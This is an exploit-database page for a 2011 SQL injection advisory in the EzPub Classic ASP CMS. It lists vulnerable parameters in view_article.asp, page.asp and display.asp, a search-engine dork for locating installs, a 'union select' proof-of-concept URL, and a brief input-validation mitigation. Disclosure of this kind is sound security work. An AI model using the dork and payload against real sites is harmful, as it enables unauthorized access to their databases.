header-logo
Suggest Exploit
vendor:
EzPub
by:
p0pc0rn
8.8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: EzPub
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2011

EzPub – Simple Classic ASP CMS Vulnerable to SQL Injection

EzPub is a Simple Classic ASP CMS vulnerable to SQL Injection. The vulnerability can be exploited by sending a malicious SQL query to the vulnerable parameter in the view_article.asp, page.asp and display.asp files. An example of a malicious SQL query is http://site.com/view_article.asp?item=1 union select 1 from test.a

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.
Source

Exploit-DB raw data:

Title:    EzPub - Simple Classic ASP CMS Vulnerable to SQL Injection
Vendor:   http://www.soft4web.ro
Found by: p0pc0rn 08/03/2011
Dork:     intext:"Powered by EZPub"


SQL - Microsoft JET Database Engine error
------------------------------------------

view_article.asp?item=[SQL]
http://site.com/page.asp?pID=[SQL]
http://site.com/display.asp?sortby=sections&sID=[SQL]

POC
---

http://site.com/view_article.asp?item=1 union select 1 from test.a

thanks,
-p0pc0rn-